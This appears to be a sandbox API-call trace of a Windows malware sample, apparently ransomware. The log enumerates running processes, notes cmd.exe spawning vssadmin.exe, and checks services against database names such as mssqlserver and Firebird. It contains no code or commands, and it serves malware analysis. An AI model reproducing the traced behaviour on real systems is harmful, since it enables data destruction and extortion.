	[0038.498] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0038.498] lstrlenW (lpString="dwm.exe") returned 7
	[0038.498] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0038.499] lstrlenW (lpString="explorer.exe") returned 12
	[0038.499] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0038.499] lstrlenW (lpString="spoolsv.exe") returned 11
	[0038.499] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0038.499] lstrlenW (lpString="taskhost.exe") returned 12
	[0038.499] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0038.500] lstrlenW (lpString="svchost.exe") returned 11
	[0038.500] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0038.500] lstrlenW (lpString="taskeng.exe") returned 11
	[0038.500] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0038.501] lstrlenW (lpString="taskhost.exe") returned 12
	[0038.501] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0038.501] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0038.501] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0038.502] lstrlenW (lpString="python tragedy.exe") returned 18
	[0038.502] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0038.502] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0038.502] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0038.503] lstrlenW (lpString="computers.exe") returned 13
	[0038.503] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0038.503] lstrlenW (lpString="separated.exe") returned 13
	[0038.503] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0038.504] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0038.504] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0038.504] lstrlenW (lpString="darkness.exe") returned 12
	[0038.504] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0038.505] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0038.505] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0038.505] lstrlenW (lpString="sophisticated.exe") returned 17
	[0038.505] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0038.506] lstrlenW (lpString="wishlist.exe") returned 12
	[0038.506] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0038.506] lstrlenW (lpString="top.exe") returned 7
	[0038.506] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0038.507] lstrlenW (lpString="implemented.exe") returned 15
	[0038.507] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0038.507] lstrlenW (lpString="comp.exe") returned 8
	[0038.507] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0038.508] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0038.508] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0038.508] lstrlenW (lpString="solved.exe") returned 10
	[0038.508] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0038.509] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0038.509] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0038.509] lstrlenW (lpString="trips.exe") returned 9
	[0038.509] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0038.510] lstrlenW (lpString="tumormanual.exe") returned 15
	[0038.510] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0038.510] lstrlenW (lpString="telecom.exe") returned 11
	[0038.510] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0038.510] lstrlenW (lpString="realistic.exe") returned 13
	[0038.510] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0038.511] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0038.511] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0038.511] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0038.511] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0038.512] lstrlenW (lpString="cmd.exe") returned 7
	[0038.512] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0038.512] lstrlenW (lpString="conhost.exe") returned 11
	[0038.512] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0038.513] lstrlenW (lpString="vssadmin.exe") returned 12
	[0038.513] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0038.807] lstrlenW (lpString="VSSVC.exe") returned 9
	[0038.853] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0
	[0038.853] CloseHandle (hObject=0x190) returned 1
	[0038.853] Sleep (dwMilliseconds=0x1f4) 
	[0039.693] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fce8
	[0039.821] EnumServicesStatusExW (in: hSCManager=0x7e0fce8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0039.822] GetLastError () returned 0xea
	[0039.822] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x123e) returned 0x7e5ca88
	[0039.822] EnumServicesStatusExW (in: hSCManager=0x7e0fce8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7e5ca88, cbBufSize=0x123e, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7e5ca88, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0039.823] CloseServiceHandle (hSCObject=0x7e0fce8) returned 1
	[0039.823] lstrlenW (lpString="Appinfo") returned 7
	[0039.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0039.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0039.823] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0039.823] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0039.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0039.824] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0039.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0039.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0039.824] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0039.824] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0039.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0039.824] lstrlenW (lpString="AudioSrv") returned 8
	[0039.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0039.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0039.824] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0039.824] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0039.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0039.824] lstrlenW (lpString="BFE") returned 3
	[0039.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0039.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0039.824] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0039.824] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0039.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0039.824] lstrlenW (lpString="CryptSvc") returned 8
	[0039.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0039.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0039.824] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0039.824] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0039.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0039.824] lstrlenW (lpString="CscService") returned 10
	[0039.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0039.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0039.825] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0039.825] lstrlenW (lpString="DcomLaunch") returned 10
	[0039.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0039.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0039.825] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0039.825] lstrlenW (lpString="Dhcp") returned 4
	[0039.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0039.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0039.825] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0039.825] lstrlenW (lpString="Dnscache") returned 8
	[0039.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0039.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0039.825] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0039.825] lstrlenW (lpString="DPS") returned 3
	[0039.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0039.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0039.825] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0039.826] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0039.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0039.826] lstrlenW (lpString="eventlog") returned 8
	[0039.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0039.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0039.826] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0039.826] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0039.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0039.826] lstrlenW (lpString="EventSystem") returned 11
	[0039.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0039.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0039.826] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0039.826] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0039.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0039.826] lstrlenW (lpString="gpsvc") returned 5
	[0039.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0039.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0039.826] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0039.826] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0039.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0039.826] lstrlenW (lpString="iphlpsvc") returned 8
	[0039.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0039.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0039.826] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0039.826] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0039.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0039.826] lstrlenW (lpString="LanmanServer") returned 12
	[0039.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0039.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0039.827] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0039.827] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0039.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0039.827] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0039.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0039.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0039.827] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0039.827] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0039.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0039.827] lstrlenW (lpString="lmhosts") returned 7
	[0039.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0039.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0039.827] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0039.827] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0039.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0039.827] lstrlenW (lpString="MMCSS") returned 5
	[0039.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0039.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0039.827] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0039.827] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0039.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0039.827] lstrlenW (lpString="MpsSvc") returned 6
	[0039.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0039.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0039.827] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0039.828] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0039.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0039.828] lstrlenW (lpString="Netman") returned 6
	[0039.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0039.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0039.828] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0039.828] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0039.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0039.828] lstrlenW (lpString="netprofm") returned 8
	[0039.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0039.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0039.828] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0039.828] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0039.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0039.828] lstrlenW (lpString="NlaSvc") returned 6
	[0039.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0039.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0039.828] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0039.828] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0039.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0039.828] lstrlenW (lpString="nsi") returned 3
	[0039.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0039.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0039.828] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0039.828] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0039.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0039.828] lstrlenW (lpString="PcaSvc") returned 6
	[0039.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0039.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0039.829] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0039.829] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0039.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0039.829] lstrlenW (lpString="PlugPlay") returned 8
	[0039.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0039.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0039.829] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0039.829] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0039.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0039.829] lstrlenW (lpString="Power") returned 5
	[0039.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0039.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0039.829] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0039.829] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0039.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0039.829] lstrlenW (lpString="ProfSvc") returned 7
	[0039.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0039.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
